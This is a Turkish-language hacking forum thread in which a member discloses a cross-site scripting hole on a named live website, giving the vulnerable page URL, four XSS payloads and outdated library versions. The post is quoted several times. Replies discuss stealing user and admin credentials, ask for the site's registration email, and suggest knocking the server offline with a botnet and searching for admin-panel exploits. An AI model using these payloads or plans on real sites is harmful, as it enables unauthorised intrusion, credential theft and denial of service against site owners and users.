Türk Hacker Sitesi XSS (turkz.org) (8 Viewers)

Joined
Jun 8, 2018
Credits
0
Rating - 0%
Türk defacerların sitesi ve forumu olan turkz.org'da bulduğum XSS açığını paylaşacağım.

URL: http://www.turkz.org/misyon-vizyon.html

Exploitler:
#<sCriPt>alert(1);</ScRipT>
#'"--></style></scRipt><scRipt>alert(1)</scRipt>
#<iframe src=javascript:alert(1) />
#<img/src/onerror=alert(1)> id("share-popup")/div[@class="link"]/a[1]/img[1]

Sonuncusunda id bölümü path'tir.

Ek olarak:
JQUERY (1.11.0) Süresi dolmuş
JQUERY UI DİALOG (1.9.2) Süresi dolmuş

----------------------------------------------------------------------------------------

Bu arada AYT'nin temasını kopyalamışlar. :D
 
Last edited:

Axis

5566
Joined
Jul 30, 2018
Credits
0
Rating - 0%
Beyler Bu xss İle Ne Gibi Zarar'lar Verebiliriz ?
Site Hacklemekten Hiç Anlamam :D
 
Joined
Jun 8, 2018
Credits
0
Rating - 0%
Beyler Bu xss İle Ne Gibi Zarar'lar Verebiliriz ?
Site Hacklemekten Hiç Anlamam :D
Bu sitede pek önemli değil ama biraz uğraşırsan kullanıcı bilgilerini çalabilirsin. Ya da admin paneli bulursan admin bilgilerini de çalman mümkün.
XSS bir zayıflık işaretidir...
 
Joined
Jul 21, 2018
Credits
0
Rating - 0%
Türk defacerların sitesi ve forumu olan turkz.org'da bulduğum XSS açığını paylaşacağım.

URL: http://www.turkz.org/misyon-vizyon.html

Exploitler:
#<sCriPt>alert(1);</ScRipT>
#'"--></style></scRipt><scRipt>alert(1)</scRipt>
#<iframe src=javascript:alert(1) />
#<img/src/onerror=alert(1)> id("share-popup")/div[@class="link"]/a[1]/img[1]

Sonuncusunda id bölümü path'tir.

Ek olarak:
JQUERY (1.11.0) Süresi dolmuş
JQUERY UI DİALOG (1.9.2) Süresi dolmuş

----------------------------------------------------------------------------------------

Bu arada AYT'nin temasını kopyalamışlar. :D
Reis bu sitenin tasarımını çalabilirsen dile benden ne dilersen.
 
S

Silinen üye 7909

Türk defacerların sitesi ve forumu olan turkz.org'da bulduğum XSS açığını paylaşacağım.

URL: http://www.turkz.org/misyon-vizyon.html

Exploitler:
#<sCriPt>alert(1);</ScRipT>
#'"--></style></scRipt><scRipt>alert(1)</scRipt>
#<iframe src=javascript:alert(1) />
#<img/src/onerror=alert(1)> id("share-popup")/div[@class="link"]/a[1]/img[1]

Sonuncusunda id bölümü path'tir.

Ek olarak:
JQUERY (1.11.0) Süresi dolmuş
JQUERY UI DİALOG (1.9.2) Süresi dolmuş

----------------------------------------------------------------------------------------

Bu arada AYT'nin temasını kopyalamışlar. :D


o siteye üye olmaya çalıştımda hata verdi eğer üye olduysan bana üyelikten sonraki maili gönderir misni kardeşim [email protected]
 
S

Silinen üye 7909

Ben demin kayıt oldum ama açıklamaya "Açığınızı buldum ağzunuza kürek sokacam." yazdığım için banlanmışım. Öyle diyor. :D
kayıt olduktan sonra gelen maili bana gönderir misin kardeşim.
 
Joined
Jun 8, 2018
Credits
0
Rating - 0%
kayıt olduktan sonra gelen maili bana gönderir misin kardeşim.
Elle onaylıyor. Ondan sonra maile bizim forum böyle bizim forum şöyle diye bir yazı geliyor.
GÖNDERDİM
 
Last edited:
Joined
May 15, 2017
Credits
0
Rating - 0%
Sunucudan birşey yapamazsınız admin panelde boş eve gidene kadar xss kapatmazlarsa ben göstericem xss den ne yapılıyor :D ( hiçbir türlü bir düşmanlığim yok hatta türk sitesi olduğu için Boran önce açığı kapatsın sipahiler gibi bir grupta saçmalık bu )
 
S

Silinen üye 7909

Sunucudan birşey yapamazsınız admin panelde boş eve gidene kadar xss kapatmazlarsa ben göstericem xss den ne yapılıyor :D ( hiçbir türlü bir düşmanlığim yok hatta türk sitesi olduğu için Boran önce açığı kapatsın sipahiler gibi bir grupta saçmalık bu )
Site cloud kullanıyor, IP botnet yada dosçular için saldırarak sunucuyu offline moduna sokabilrisin. Admin panel muhabbetine gelirsekte araştırmadım fakat muhakkak bir kaç exploit vardır xenforo'Nun burası için müsait olunca araştırıcam zaten
 

Users who are viewing this thread

Top